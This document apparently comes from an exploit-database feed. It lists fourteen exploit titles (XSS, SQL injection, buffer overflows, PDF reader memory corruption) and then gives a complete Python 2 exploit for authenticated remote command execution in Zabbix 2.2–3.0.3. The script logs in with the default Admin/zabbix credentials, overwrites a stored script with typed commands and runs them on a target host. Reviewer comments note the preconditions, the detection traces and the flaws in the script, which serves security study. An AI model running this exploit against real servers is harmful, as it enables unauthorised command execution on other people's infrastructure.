
14 new exploits FRticket Ticket System - Stored XSS Viart Shopping Cart 5.0 - CSRF Shell Upload Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass Dream Gallery 2.0 - Admin Panel Authentication Bypass Grid Gallery 1.0 - Admin Panel Authentication Bypass Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC iSQL 1.0 - Shell Command Injection iSQL 1.0 - isql_main.c Buffer Overflow PoC Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A

# What this script does (Python 2 only: raw_input and the print statement):
#   1. Calls user.login on /api_jsonrpc.php with the account configured below.
#   2. For every line typed at the prompt, calls script.update to replace the
#      stored command of script ID 1 with that line, then script.execute to
#      run script ID 1 against `hostid`, and prints the returned "value".
#
# Reviewer notes:
#   - This is not an authentication bypass. It needs valid credentials for an
#     account that the API allows to modify and run scripts (presumably an
#     administrative account -- confirm for the version in use). The values
#     below are the stock Zabbix Admin/zabbix login, so changing that default
#     password and limiting who can reach api_jsonrpc.php removes the
#     precondition.
#   - Script ID 1 is overwritten and never restored: after a run it still
#     holds the last line typed. On an authorised test, record the original
#     command first and put it back afterwards. When reviewing a server,
#     look for an unexpected command in that script and for script.update /
#     script.execute calls in the audit trail and the web server's access
#     log (exact log coverage depends on the Zabbix version -- verify).
#   - ZABIX_ROOT is an http:// URL, so the password and the session token
#     travel unencrypted as configured.
#   - No response is checked; see the comment inside the loop.

import requests
import json
import readline  # imported for its side effect only: line editing in raw_input()

ZABIX_ROOT = 'http://192.168.66.2'  ### Zabbix IP-address
url = ZABIX_ROOT + '/api_jsonrpc.php'  ### Don't edit

login = 'Admin'  ### Zabbix login
password = 'zabbix'  ### Zabbix password
hostid = '10084'  ### Zabbix hostid

headers = {'content-type': 'application/json'}

### auth
login_request = {
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {'user': login, 'password': password},
    "auth": None,
    "id": 0,
}
# `auth` holds the decoded login response; its 'result' field is used as the
# session token for every later call.
auth = requests.post(url, data=json.dumps(login_request), headers=headers).json()

while True:
    cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
    if cmd == "quit":
        break
    if cmd == "":
        # An empty line only changes the banner: both requests below are
        # still sent, with an empty command in the update.
        print "Result of last command:"

    ### update
    # auth['result'] is looked up on every pass. A rejected login presumably
    # carries an "error" member instead of "result", in which case the
    # KeyError surfaces here, after the first prompt, not at login time.
    update_request = {
        "jsonrpc": "2.0",
        "method": "script.update",
        "params": {"scriptid": "1", "command": cmd},
        "auth": auth['result'],
        "id": 0,
    }
    # The update response is discarded without being inspected.
    requests.post(url, data=json.dumps(update_request), headers=headers)

    ### execute
    execute_request = {
        "jsonrpc": "2.0",
        "method": "script.execute",
        "params": {"scriptid": "1", "hostid": hostid},
        "auth": auth['result'],
        "id": 0,
    }
    reply = requests.post(url, data=json.dumps(execute_request), headers=headers).json()
    print reply["result"]["value"]